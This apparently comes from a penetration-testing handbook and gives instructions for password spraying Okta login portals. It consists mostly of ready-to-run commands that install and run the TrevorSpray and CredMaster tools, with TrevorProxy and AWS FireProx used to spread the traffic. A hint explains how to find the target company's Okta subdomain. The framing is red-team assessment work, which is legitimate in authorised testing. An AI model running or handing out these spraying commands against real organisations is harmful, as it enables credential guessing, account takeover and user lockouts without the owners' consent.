# Okta ### Password Spraying Password spraying Okta is just as easy as password spraying any other service, however, visibility can be difficult at times as Okta does not display if a user has been locked out. For this reason, it is recommended to configure password spray tooling to have longer lockouts, ensuring there are no business disruptions. #### Spraying Okta with TrevorSpray ```bash # Installation pip install git+https://github.com/blacklanternsecurity/trevorproxy pip install git+https://github.com/blacklanternsecurity/trevorspray # Password Spraying trevorspray -m okta -u $users -p $password ``` {% hint style="info" %} After submitting the above command, TrevorSpray will ask for the subdomain of the company you're targeting $`.okta.com` This should have been identified during the reconaissance phase and is often `$companyname.okta.com`. {% endhint %} #### Spraying Okta with CredMaster ```bash # https://github.com/knavesec/CredMaster python3 credmaster.py --plugin -u $users -p $passwords -a $useragents --config $config ``` CredMaster requires AWS access keys to setup FireProx, the following guide can be used to configure the appropriate permissions and start spraying: {% embed url="" %}